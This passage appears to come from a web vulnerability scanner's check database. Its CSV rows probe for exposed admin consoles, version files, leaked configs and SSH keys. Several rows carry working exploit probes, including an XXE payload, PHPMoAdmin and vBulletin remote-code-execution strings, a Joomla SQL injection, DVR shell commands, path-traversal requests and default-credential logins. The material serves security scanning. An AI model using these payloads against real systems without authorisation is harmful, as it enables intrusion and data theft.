information.\",\"\",\"\"\n\"006975\",\"\",\"3\",\"/simplecfg.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006976\",\"\",\"3\",\"/tr064dev.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006977\",\"\",\"3\",\"/upnp/IGD.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006978\",\"\",\"3\",\"/upnp/printer/ddf.xml\",\"GET\",\"BODY:<root&&BODY:upnp-org\",\"Device UPnP XML file found, which may leak device information.\",\"\",\"\"\n\"006979\",\"\",\"d\",\"/apidocs/\",\"GET\",\"BODY:API\\sDoc\",\"Possible API documentation available.\",\"\",\"\"\n\"006980\",\"\",\"3\",\"/ipn_log.txt\",\"GET\",\"BODY:payer_email\",\"PayPal log file found and may contain sensitive information.\",\"\",\"\"\n\"006981\",\"\",\"3\",\"/paypal/ipn_log.txt\",\"GET\",\"BODY:payer_email\",\"PayPal log file found and may contain sensitive information.\",\"\",\"\"\n\"006983\",\"\",\"3\",\"/psystems/paypal/ipn_log.txt\",\"GET\",\"BODY:payer_email\",\"PayPal log file found and may contain sensitive information.\",\"\",\"\"\n\"006984\",\"\",\"3be\",\"/_profiler/\",\"GET\",\"BODY:symfony&&BODY:No\\sroute\",\"Symfony Profiler may reveal sensitive application information.\",\"\",\"\"\n\"006985\",\"CVE-2014-3398\",\"3b\",\"/CSCOSSLC/config-auth\",\"GET\",\"BODY:<version\\swho=([^>]+>.+)<\\/version>\",\"Cisco ASA Web VPN may reval version info: $1\",\"\",\"\"\n\"006986\",\"\",\"d\",\"@MAGENTOapi/soap/?wsdl=1\",\"GET\",\"BODY:<definitions xmlns:typens=\\\"urn:Magento\\\"\",\"Magento Shop WebService identified.\",\"\",\"\"\n\"006987\",\"\",\"123b\",\"@MAGENTORELEASE_NOTES.txt\",\"GET\",\"BODY:==== ([0-9\\.]+) ====\",\"Magento Shop version $1 changelog identified.\",\"\",\"\"\n\"006988\",\"\",\"e\",\"@MAGENTOadmin/\",\"GET\",\"BODY:Magento\\sInc\",\"Magento Shop admin backend identified.\",\"\",\"\"\n\"006989\",\"\",\"e\",\"@MAGENTOdownloader/\",\"GET\",\"BODY:Magento\\sConnect\\sManager\\sver\",\"Magento Connect Manager login identified. This might also reval the installed version of Magento\",\"\",\"\"\n\"006990\",\"\",\"3b\",\"@AXIS2services/Version/getVersion\",\"GET\",\"BODY:Hello\\sI\\sam\\sAxis2&&BODY:Hi\\s-\\sthe\\sAxis2\\sversion\\sis\",\"Apache Axis2 version identified.\",\"\",\"\"\n\"006991\",\"\",\"b\",\"@ADOBEXML\",\"GET\",\"BODY:<amfx ver=&&BODY:<\\/amfx>\",\"Adobe BlazeDS identified.\",\"\",\"\"\n\"006992\",\"CVE-2009-3960\",\"357\",\"@ADOBEXML\",\"GET\",\"@LFI()\",\"Adobe BlazeDS is vulnerable to an XXE\",\"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \\\"/etc/hosts\\\"> ]><amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\"><body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits/></object><null/><string/><string/><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&xxe;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\",\"Content-Length: 714\"\n\"006993\",\"CVE-2003-0411\",\"3\",\"/index.JSP\",\"GET\",\"BODY:<\\%&&BODY:\\%>\",\"Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase .JSP extension instead of the lowercase .jsp extension.\",\"\",\"\"\n\"006994\",\"\",\"8\",\"/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22@LFI(nix,abs)%22%26\",\"GET\",\"@LFI()\",\"Mitel Audio and Web Conferencing (AWC) contains a command execution vulnerability.\",\"\",\"\"\n\"006995\",\"\",\"b\",\"/portal/\",\"GET\",\"BODY:Mitel\\sNetworks\",\"Mitel Audio and Web Conferencing login found.\",\"\",\"\"\n\"006996\",\"\",\"b\",\"/server-manager/\",\"GET\",\"CODE:401\",\"Mitel Audio and Web Conferencing server manager identified.\",\"\",\"\"\n\"006997\",\"\",\"b\",\"/awcuser/cgi-bin/vcs?xml=withXsl&xsl=/vcs/vcs_home.xsl&show_codes=&current_vanities=&settings=global%3buser%3bphone&show_port_res_settings\",\"GET\",\"BODY:Verify\\sClient\",\"Mitel Audio and Web Conferencing found.\",\"\",\"\"\n\"006998\",\"\",\"e\",\"@JENKINSmanage\",\"GET\",\"BODY:Manage\\sJenkins&&BODY:Manage\\sHudson\",\"Jenkins/Hudson Management console accessible without authentication.\",\"\",\"\"\n\"006999\",\"\",\"8\",\"@JENKINSscript\",\"GET\",\"BODY:Script\\sConsole&&BODY:Groovy\\sscript\",\"Jenkins/Hudson Groovy Script console accessible without authentication. This allows to execution of shell commands.\",\"\",\"\"\n\"007000\",\"\",\"d\",\"@AXIS2services/listServices\",\"GET\",\"BODY:<title>List\\sServices\",\"Apache Axis2 WebServices identified.\",\"\",\"\"\n\"007001\",\"\",\"b\",\"@AXIS2axis2-web/index.jsp\",\"GET\",\"BODY:<title>Axis\\s2\\s\\-\\sHome\",\"Apache Axis2 Web Application identified.\",\"\",\"\"\n\"007004\",\"CVE-2010-2103\",\"b8e\",\"@AXIS2axis2-admin/login\",\"POST\",\"BODY:Welcome\\sto\\sAxis2\\sWeb\\sAdmin\\sModule\\s!!\",\"Apache Axis2 administration console with default credentials admin:axis2 found.\",\"userName=admin&password=axis2&submit=+Login+\",\"\"\n\"007006\",\"\",\"be\",\"/adminer.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007007\",\"https://github.com/tennc/webshell/blob/master/php/404.php.txt\",\"b\",\"/404.php\",\"GET\",\"BODY:<input type=password name=pass>\",\"The 404.php backdoor program seems to be present.\",\"\",\"\"\n\"007009\",\"\",\"be\",\"@AXIS2Login.jsp\",\"GET\",\"BODY:Login\\sto\\sAxis2::\",\"Apache Axis2 administration console found.\",\"\",\"\"\n\"007010\",\"CVE-2015-2208\",\"8\",\"@MODIR@MOFILE\",\"POST\",\"BODY:uid=&&BODY:gid=\",\"PHPMoAdmin is vulnerable to a remote code execution.\",\"object=1;system('id');\",\"\"\n\"007011\",\"CVE-2015-2208\",\"8\",\"@MODIR@MOFILE?collection=secpulse&action=listRows&find=array();phpinfo();exit;\",\"GET\",\"BODY:<title>phpinfo\\(\\)\",\"PHPMoAdmin is vulnerable to a remote code execution.\",\"\",\"\"\n\"007012\",\"\",\"be\",\"@MODIR@MOFILE\",\"GET\",\"BODY:<title>phpMoAdmin\",\"PHPMoAdmin identified.\",\"\",\"\"\n\"007013\",\"\",\"be\",\"@RAINLOOP?admin\",\"GET\",\"BODY:RainLoop\\sTeam&&BODY:rainloopAppData\",\"RainLoop Webmail admin backend identified. Default credentials are admin:12345\",\"\",\"\"\n\"007014\",\"\",\"b9\",\"@WORDPRESSwp-content/plugins/gravityforms/change_log.txt\",\"GET\",\"CODE:200&&!BODY:1\\.9\\.3\\.6\",\"Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849\",\"\",\"\"\n\"007015\",\"\",\"b\",\"@TOMCATADMINstatus\",\"GET\",\"BODY:<tt>conf\\/tomcat\\-users\\.xml<\\/tt>\",\"Default Tomcat Server Status interface found\",\"\",\"\"\n\"007016\",\"\",\"b\",\"@TOMCATADMINstatus\",\"GET\",\"CODE:401\",\"Tomcat Server Status interface found (pass protected)\",\"\",\"\"\n\"007017\",\"\",\"be\",\"@TOMCATADMINlogin.jsp\",\"GET\",\"BODY:<title>Tomcat Server Administration\",\"Tomcat Server Administration interface found\",\"\",\"\"\n\"007020\",\"\",\"b\",\"/README.mediawiki\",\"GET\",\"BODY:== MediaWiki ==\",\"Mediawiki README file found\",\"\",\"\"\n\"007021\",\"\",\"123b\",\"@MANTISdoc/RELEASE\",\"GET\",\"BODY:MantisBT Release Notes\",\"Mantis Bugtracker Release Notes identified.\",\"\",\"\"\n\"007022\",\"\",\"123b\",\"@DOKUWIKIVERSION\",\"GET\",\"BODY:[0-9]+\\-[0-9]+\\-[0-9]+[a-z]? \\\"[a-zA-Z].*\\\"\",\"Dokuwiki Version file identified.\",\"\",\"\"\n\"007023\",\"\",\"e\",\"/solr/#/\",\"GET\",\"BODY:<span>Apache\\sSOLR\",\"Apache Solr console found\",\"\",\"\"\n\"007024\",\"\",\"be\",\"/sixcms/admin/login/\",\"GET\",\"BODY:<title>SixCMS\",\"SixCMS Administration interface found\",\"\",\"\"\n\"007025\",\"\",\"be\",\"@ROCKMONGOindex.php?action=login.index\",\"GET\",\"BODY:<title>RockMongo\",\"RockMongo MongoDB administration tool found. Default credentials are admin:admin.\",\"\",\"\"\n\"007026\",\"\",\"be\",\"@ROCKMONGOindex.php?action=admin.index\",\"GET\",\"BODY:Command Line&&BODY:Build Information&&BODY:<title>RockMongo\",\"Unprotected RockMongo MongoDB administration tool found.\",\"\",\"\"\n\"007027\",\"http://humanstxt.org/\",\"3\",\"/humans.txt\",\"GET\",\"CODE:200\",\"The humans.txt file may reveal information aboute site owners/developers.\",\"\",\"\"\n\"007028\",\"\",\"be\",\"/wba/home.html\",\"GET\",\"BODY:LANSA\\sGroup|Arterial\\sSoftware\",\"Lansa aXis administration console found.\",\"\",\"\"\n\"007029\",\"\",\"be\",\"/axesde/\",\"GET\",\"BODY:LANSA\\sGroup\",\"Lansa aXis Data Explorer console found.\",\"\",\"\"\n\"007031\",\"\",\"be\",\"/ts/skins/ts_basic.html?lang=en/\",\"GET\",\"BODY:aXes\\sTerminal\\sServer\",\"Lansa aXis terminal explorer found.\",\"\",\"\"\n\"007032\",\"\",\"be\",\"/ts/dev/index.html?lang=en/\",\"GET\",\"BODY:aXes\\sTerminal\\sServer\",\"Lansa aXis terminal explorer found.\",\"\",\"\"\n\"007033\",\"\",\"be\",\"/wba/browser_test.html\",\"GET\",\"BODY:aXes\\sBrowser\\sCompatibility\",\"Lansa aXes Browser Compatibility.\",\"\",\"\"\n\"007034\",\"\",\"be\",\"/echo\",\"GET\",\"BODY:FastCGI\\sEcho\",\"Lansa aXes echo page found.\",\"\",\"\"\n\"007035\",\"\",\"b\",\"/cgi-bin/lansaweb?about\",\"GET\",\"BODY:LANSA\\sfor\\sthe\\sWeb\",\"Lansa for the Web main CGI found.\",\"\",\"\"\n\"007036\",\"https://www.phpmyadmin.net/\",\"b\",\"@PHPMYADMINdoc/html/index.html\",\"GET\",\"BODY:phpMyAdmin.*Documentation&&CODE:200\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"007037\",\"https://www.phpmyadmin.net/\",\"b\",\"@PHPMYADMINdocs/html/index.html\",\"GET\",\"BODY:phpMyAdmin.*Documentation&&CODE:200\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"007038\",\"\",\"3\",\"/mod_gzip_status\",\"GET\",\"BODY:mod_gzip_version&&BODY:mod_gzip_on&&CODE:200\",\"The mod_gzip_status page may reveal the version of mod_gzip running on this host.\",\"\",\"\"\n\"007039\",\"CVE-2015-2857\",\"7\",\"/courier/intermediate_login.html\",\"GET\",\"@LFI()\",\"Accellion allows LFI via the statecode cookie.\",\"\",\"Cookie: statecode=../../../../../../../../../etc/hosts%00\"\n\"007040\",\"CVE-2015-2856\",\"8\",\"/tws/getStatus\",\"POST\",\"BODY:\\\"result_msg\\\":\\\"Success\\\"\",\"Accellion allows RCE oath_token.\",\"transaction_id=1&oauth_token='%3becho '\",\"\"\n\"007041\",\"\",\"3\",\"/rails/info/properties/\",\"GET\",\"BODY:>(?:Ruby|Rails)\\sversion<&&BODY:<title>Routes<\\/title>&&CODE:200\",\"The Ruby on Rails status page may reveal the version of RoR and further details on this host.\",\"\",\"\"\n\"007042\",\"\",\"3\",\"/rails/info/routes/\",\"GET\",\"BODY:<title>Routes<\\/title>&&CODE:200\",\"The Ruby on Rails routes page may reveal all available routes on this host.\",\"\",\"\"\n\"007043\",\"\",\"d\",\"/wps/wsdl\",\"GET\",\"BODY:wsdl:definitions\",\"IBM Websphere web services found.\",\"\",\"\"\n\"007044\",\"\",\"1e\",\"/wps/portal/Home/Welcome/!ut/\",\"GET\",\"BODY:Sign\\sUp\",\"IBM Websphere default portal found. May allow users to create accounts.\",\"\",\"\"\n\"007045\",\"CVE-2015-2067\",\"5\",\"@MAGMIweb/ajax_pluginconf.php?file=@LFI()&plugintype=utilities&pluginclass=CustomSQLUtility\",\"GET\",\"@LFI()\",\"MAGMI allows any file to be retrieved remotely.\",\"\",\"\"\n\"007046\",\"\",\"5\",\"@MAGMIweb/download_file.php?file=@LFI()\",\"GET\",\"@LFI()\",\"MAGMI allows any file to be retrieved remotely.\",\"\",\"\"\n\"007047\",\"\",\"5\",\"@MAGMIweb/download_file.php?file=../../app/etc/local.xml\",\"GET\",\"BODY:<username>.*<\\/username>&&BODY:<password>.*<\\/password>\",\"MAGMI allows any file to be retrieved remotely.\",\"\",\"\"\n\"007048\",\"\",\"be\",\"@MAGMIweb/magmi.php\",\"GET\",\"BODY:<link rel=\\\"stylesheet\\\" href=\\\"css\\/magmi\\.css\\\"><\\/link>\",\"MAGMI Administration interface found.\",\"\",\"\"\n\"007049\",\"\",\"123b\",\"@MAGMIReleaseNotes.txt\",\"GET\",\"BODY:RELEASE NOTES FOR MAGMI\",\"MAGMI Release Notes identified.\",\"\",\"\"\n\"007050\",\"\",\"be\",\"@HYBRIS\",\"GET\",\"BODY:(?i)Hybris&&BODY:(?i)Management\\sConsole\",\"SAP Hybris Management Console found. Default credentials are admin:nimda\",\"\",\"\"\n\"007051\",\"\",\"be\",\"@HYBRISlogin.jsp\",\"GET\",\"BODY:(?i)Hybris&&BODY:(?i)Administration\\sConsole\",\"SAP Hybris Administration Console found. Default credentials are admin:nimda\",\"\",\"\"\n\"007052\",\"\",\"23\",\"/cfg/CFGConnectionParams.txt\",\"GET\",\"BODY:user=\",\"Caremark Carestream config file found. May include account information and host data.\",\"\",\"\"\n\"007053\",\"\",\"23\",\"/serverVars.js\",\"GET\",\"BODY:SERVER_IPADDRESS\",\"Caremark Carestream JavaScript config file found. May include host information..\",\"\",\"\"\n\"007054\",\"\",\"9\",\"/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)\",\"GET\",\"BODY:Duplicate\\sEntry&&BODY:Subquery\",\"Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0\",\"\",\"\"\n\"007055\",\"\",\"3b\",\"/azenv.php\",\"GET\",\"BODY:HTTP_CONNECTION\",\"This program is a proxy test script which echoes environment variables.\",\"\",\"\"\n\"007056\",\"\",\"be\",\"@PIWIKindex.php\",\"GET\",\"BODY:(?:)<title>.*Piwik.*<\\/title>&&BODY:http://piwik\\.org&&CODE:200\",\"Piwik Analytics login found.\",\"\",\"\"\n\"007057\",\"\",\"123b\",\"@PIWIKCHANGELOG.md\",\"GET\",\"BODY:## Piwik ([0-9.]+)&&CODE:200\",\"Piwik Analytics version $1 changelog identified.\",\"\",\"\"\n\"007058\",\"CVE-2015-7808\",\"8\",\"@VBULLETINajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20@LFI(nix,abs,url)%29%22%3B%7D\",\"GET\",\"@LFI()\",\"vBulletin 5 contains a remote command execution.\",\"\",\"\"\n\"007059\",\"\",\"3\",\"/GulpFile.js\",\"GET\",\"BODY:var\\sgulp\",\"GulpFile.js build config may reveal sensitive information.\",\"\",\"\"\n\"007060\",\"\",\"3\",\"/admin/views/ajax/autocomplete/user/a\",\"GET\",\"BODY:\\\"admin\\\":\",\"Drupal Views module discloses user names, including the administrator. http://www.madirish.net/node/465.\",\"\",\"\"\n\"007062\",\"\",\"e\",\"/page.cmd\",\"POST\",\"BODY:(?:IP configuration|Subnet mask|Default route|Primary DNS)\",\"Unify/Siemens OpenStage SIP has a default password 123456 set.\",\"page_submit=WEBMp_Admin_Login&page-next=WEBM_Admin_IpConfiguration&AdminPassword=123456\",\"\"\n\"007063\",\"\",\"e\",\"/page.cmd\",\"POST\",\"BODY:(?:IP configuration|Subnet mask|Default route|Primary DNS)\",\"Unify/Siemens OpenStage SIP has a default password 123456 set.\",\"page_submit=WEBMp_AdminLogin&page-next=WEBM_Admin_IpConfiguration&WEBMv-Admin-Password=123456\",\"\"\n\"007064\",\"\",\"e\",\"/page.cmd\",\"POST\",\"BODY:(?:IP configuration|Subnet mask|Default route|Primary DNS)\",\"Unify/Siemens OpenStage SIP has a default password 123456 set.\",\"page_submit=WEBMp_AdminLogin&page-next=WEBM_Admin_IpConfiguration&AdminPassword=123456\",\"\"\n\"007065\",\"\",\"e\",\"/authorize\",\"POST\",\"BODY:Access Granted\\. This IP Address now has admin&&BODY:access to the restricted printer pages\\.\",\"Zebra PrintServer Webinterface has a default password 1234 set.\",\"0=1234\",\"\"\n\"007066\",\"\",\"eb\",\"/sitecore/login\",\"GET\",\"BODY:Sitecore\\.NET\",\"Sitecore CMS login found.\",\"\",\"\"\n\"007067\",\"\",\"eb\",\"/sitecore/admin/login.aspx?returnUrl=/\",\"GET\",\"BODY:into\\sSitecore\",\"Sitecore CMS admin login found.\",\"\",\"\"\n\"007070\",\"\",\"be\",\"/struts/webconsole.html\",\"GET\",\"BODY:wc\\-command\",\"Struts debugging is enabled and OGNL console is available.\",\"\",\"\"\n\"007071\",\"\",\"3b\",\"/owa/auth/logon.aspx\",\"GET\",\"BODY:\\<title\\>Outlook Web App<\\/title\\>&&BODY:(/owa/([0-9.]+)/themes/|/owa/auth/([0-9.]+)/themes/)\",\"Outlook Web App $1 identified. OWA is exposing its version within the themes path like /owa/auth/15.0.995/themes.\",\"\",\"\"\n\"007072\",\"\",\"be\",\"/system/console/configMgr\",\"GET\",\"BODY:AEM Sign\",\"Adobe Experience Manager OSGi console.\",\"\",\"\"\n\"007074\",\"\",\"be\",\"/system/sling/cqform/defaultlogin.html\",\"GET\",\"BODY:QUICKSTART_HOMEPAGE\",\"Adobe Experience Manager Sling console.\",\"\",\"\"\n\"007075\",\"\",\"be\",\"/crx/de/index.jsp\",\"GET\",\"BODY:crxde_favicon\\.ico\",\"Adobe Experience Manager CRXDE console.\",\"\",\"\"\n\"007076\",\"\",\"be\",\"/libs/cq/core/content/login.html\",\"GET\",\"BODY:CQ5 \\- Sign In\",\"Adobe Experience Manager CQ5 admin login.\",\"\",\"\"\n\"007077\",\"https://exploit-db.com/exploits/39184/\",\"5\",\"/scgi-bin/platform.cgi\",\"POST\",\"@LFI()&&BODY:loic_ipsec:\",\"Devices with Cisco http firewall are prone to a local file inclusion.\",\"button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/hosts%00\",\"\"\n\"007078\",\"\",\"3\",\"@PAGESPEED\",\"GET\",\"BODY:<b>Pagespeed\\sAdmin<\\/b>\",\"This reveals information about the running Pagespeed Module (mod_pagespeed/ngx_pagespeed). Comment out appropriate line in the webservers conf file or restrict access to allowed sources.\",\"\",\"\"\n\"007082\",\"\",\"23\",\"/.MySCMServerInfo\",\"GET\",\"BODY:SCMBranch\",\"Surround SCM file reveals a list of files in source control.\",\"\",\"\"\n\"007083\",\"\",\"23\",\"/_diagnostic.jsp\",\"GET\",\"BODY:WebDX\\sSC\",\"GE Centricity PACS WebDX diagnostics page reveals detailed application and system information.\",\"\",\"\"\n\"007084\",\"https://www.pentestpartners.com/blog/pwning-cctv-cameras/\",\"8\",\"/shell?cat%20@LFI(abs)\",\"GET\",\"BODY:root\\:.*\\:0\",\"Multiple DVR devices are prone to a remote command execution.\",\"\",\"\"\n\"007085\",\"https://www.pentestpartners.com/blog/pwning-cctv-cameras/\",\"ae\",\"/view2.html\",\"GET\",\"BODY:<span\\slxc_lang=\\\"view_Channel\\\">Channel<\\/span>&&BODY:<a\\sid=\\\"connectAll\\\"\\slxc_lang=\\\"view_Connect_all\\\">&&CODE:200\",\"Multiple DVR devices are prone to an authentication bypass.\",\"\",\"Cookie: dvr_camcnt=24; dvr_usr=null; dvr_pwd=null\"\n\"007086\",\"https://www.pentestpartners.com/blog/pwning-cctv-cameras/\",\"ae\",\"/main.html\",\"GET\",\"BODY:<span\\slxc_lang=\\\"view_Channel\\\">Channel<\\/span>&&BODY:<a\\sid=\\\"connectAll\\\"\\slxc_lang=\\\"view_Connect_all\\\">&&CODE:200\",\"Multiple DVR devices are prone to an authentication bypass.\",\"\",\"Cookie: dvr_camcnt=24; dvr_usr=null; dvr_pwd=null\"\n\"007087\",\"\",\"b\",\"@SYMPHONYREADME.markdown\",\"GET\",\"BODY:http:\\/\\/getsymphony\\.com&&CODE:200\",\"Symphony CMS README file found containing the version of the CMS.\",\"\",\"\"\n\"007088\",\"\",\"b\",\"@SYMPHONYREADME\",\"GET\",\"BODY:Symphony\\s([0-9.]+)&&CODE:200\",\"Symphony CMS version $1 README file found containing the version of the CMS.\",\"\",\"\"\n\"007089\",\"\",\"3b\",\"@AXIS2services/Version?method=getVersion\",\"GET\",\"BODY:Apache\\sAxis\\sversion&&BODY:The\\sAXIS\\sengine\\scould\\snot\\sfind\\sa\\starget\\sservice\\sto\\sinvoke!\",\"Apache Axis identified. This URL might also expose the running version of Axis.\",\"\",\"\"\n\"007090\",\"\",\"3b\",\"@CKEDITORckeditor.js\",\"GET\",\"BODY:CKSource&&BODY:CKEDITOR\",\"CKEditor identified. This file might also expose the version of CKEditor.\",\"\",\"\"\n\"007091\",\"\",\"3b\",\"@CKEDITORCHANGES.md\",\"GET\",\"BODY:CKEditor&&BODY:Changelog\",\"CKEditor Changelog identified.\",\"\",\"\"\n\"007092\",\"\",\"4\",\"@CKEDITORsamples/sample_posteddata.php\",\"POST\",\"BODY:<script>alert\\('XSS'\\)<\\/script>&&BODY:ckeditor.com\",\"CKEditor 4.0.1 and below is vulnerable to a Cross-Site Scripting (XSS) vulnerability.\",\"<script>alert('XSS')</script>[]=PATH DISCLOSURE\",\"\"\n\"007093\",\"\",\"3\",\"/app/plugins/php_plugin/phpinfo.php\",\"GET\",\"BODY:PHP Version\",\"Android PAW Server PHP plugin phpinfo.php script reveals system information.\",\"\",\"\"\n\"007094\",\"https://getcomposer.org/\",\"23\",\"/composer.json\",\"GET\",\"BODY:\\\"(?:require|name)\\\":\\s\",\"PHP Composer configuration file reveals configuration information.\",\"\",\"\"\n\"007095\",\"https://getcomposer.org/\",\"23\",\"/composer.lock\",\"GET\",\"BODY:(?:getcomposer\\.org|\\\"require\\\":\\s)\",\"PHP Composer configuration file reveals configuration information.\",\"\",\"\"\n\"007096\",\"\",\"2\",\"/install.sql\",\"GET\",\"BODY:(?i)(?:CREATE TABLE|INSERT INTO)\",\"Installation SQL file found.\",\"\",\"\"\n\"007097\",\"\",\"2\",\"/setup.sql\",\"GET\",\"BODY:(?i)(?:CREATE TABLE|INSERT INTO)\",\"Setup SQL file found.\",\"\",\"\"\n\"007098\",\"RFC-5785\",\"1\",\"/.well-known/browserid\",\"GET\",\"BODY:public\\-key&&BODY:provisioning\",\"Mozilla Persona may leak additional URLs on the server.\",\"\",\"\"\n\"007099\",\"RFC-5785\",\"1\",\"/.well-known/acme-challenge\",\"GET\",\"BODY:Index of \\/\",\"Letsencrypt.org key information may be available in this directory.\",\"\",\"\"\n\"007100\",\"RFC-5785 http://www.bacnet.org/Addenda/Add-135-2012am-ppr3-draft-17_chair_approved.pdf\",\"1\",\"/.well-known/ashrae\",\"GET\",\"BODY:bacnet\\.org\",\"ASHRAE file may contain server info.\",\"\",\"\"\n\"007101\",\"RFC-5785 https://github.com/google/digitalassetlinks/blob/master/well-known/details.md\",\"1\",\"/.well-known/assetlinks.json\",\"GET\",\"BODY:namespace\\\"\",\"Google Asset Links Specification file may contain server info.\",\"\",\"\"\n\"007102\",\"RFC-5785 http://tools.ietf.org/html/rfc6764\",\"1\",\"/.well-known/caldav\",\"GET\",\"BODY:current\\-user\\-principal\",\"CalDAV file may contain server info.\",\"\",\"\"\n\"007103\",\"RFC-5785 http://tools.ietf.org/html/rfc6764\",\"1\",\"/.well-known/carddav\",\"GET\",\"BODY:principal\",\"CardDAV file may contain server info.\",\"\",\"\"\n\"007104\",\"https://typo3.org/\",\"23\",\"@TYPO3ChangeLog\",\"GET\",\"BODY:Release\\sof\\sTYPO3\",\"TYPO3 ChangeLog file found.\",\"\",\"\"\n\"007105\",\"RFC-5785 RFC-6690 http://tools.ietf.org/html/rfc6690\",\"1\",\"/.well-known/core\",\"GET\",\"BODY:>rt=&&BODY:>if=\",\"core file may contain server info/links.\",\"\",\"\"\n\"007106\",\"RFC-5785 https://www.w3.org/TR/2015/CR-tabular-data-model-20150716/\",\"1\",\"/.well-known/csvm\",\"GET\",\"BODY:csv\\-metadata\\.json&&BODY:csvm\\.json\",\"csvm file may contain server links.\",\"\",\"\"\n\"007107\",\"https://typo3.org/\",\"b\",\"@PHPMYADMINREADME\",\"GET\",\"BODY:phpMyAdmin\\s\\-\\sReadme&&CODE:200\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"007108\",\"\",\"23\",\"/v1/credentials\",\"GET\",\"BODY:secretValue:\\s\\\"\",\"Rancher Docker manager appears to be available without authentication. It has built in remote shell functionality. Have fun.\",\"\",\"\"\n\"007109\",\"\",\"1\",\"/web.txt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"007110\",\"\",\"d\",\"@AXIS2services/AdminService?wsdl\",\"GET\",\"BODY:AdminServiceResponse&&BODY:AdminServiceRequest\",\"Apache Axis AdminService identified.\",\"\",\"\"\n\"007111\",\"\",\"e\",\"@AXIS2servlet/AdminServlet\",\"GET\",\"BODY:<title>Axis<\\/title>&&BODY:Server\\sis\\srunning\",\"Apache Axis AdminServlet identified.\",\"\",\"\"\n\"007112\",\"\",\"23\",\"@AXIS2SOAPMonitor\",\"GET\",\"BODY:SOAPMonitorApplet\\.class\",\"Apache Axis SOAPMonitor identified.\",\"\",\"\"\n\"007113\",\"\",\"d\",\"@AXIS2EchoHeaders.jws?method=list\",\"GET\",\"BODY:<soapenv:Envelope\",\"Apache Axis EchoHeaders default webservice.\",\"\",\"\"\n\"007114\",\"\",\"b\",\"@AXIS2index.jsp\",\"GET\",\"BODY:Apache\\-AXIS<\\/h1>&&BODY:<title>Apache\\-Axis<\\/title>\",\"Apache Axis Web Application identified.\",\"\",\"\"\n\"007115\",\"http://ws.apache.org/axis/java/security.html\",\"23\",\"@AXIS2servlet/AxisServlet\",\"GET\",\"BODY:And now\\.\\.\\.\\sSome\\sServices\",\"Apache Axis web services reveals information about all installed web services.\",\"\",\"\"\n\"007116\",\"\",\"be\",\"/workarea/login.aspx\",\"GET\",\"BODY:ektron\\.javascript\",\"Ektron CMS administrative interface found.\",\"\",\"\"\n\"007119\",\"\",\"3\",\"/core/modules/config/config.info.yml\",\"GET\",\"BODY:version:\",\"Drupal version number revealed in config.info.yml\",\"\",\"\"\n\"007120\",\"\",\"3\",\"/core/CHANGELOG.txt\",\"GET\",\"BODY:Drupal\\s\",\"Drupal version number revealed in CHANGELOG.txt\",\"\",\"\"\n\"007121\",\"\",\"3\",\"/.ssh/id_rsa\",\"GET\",\"BODY:[-]{5}|((?:BEGINEND)\\sRSA\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)[-]{5}&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007122\",\"\",\"3\",\"/.ssh/id_rsa.pub\",\"GET\",\"BODY:ssh\\-rsa&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007123\",\"\",\"3\",\"/.ssh/id_dsa\",\"GET\",\"BODY:[-]{5}((?:BEGIN|END)\\sDSA\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)[-]{5}&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the 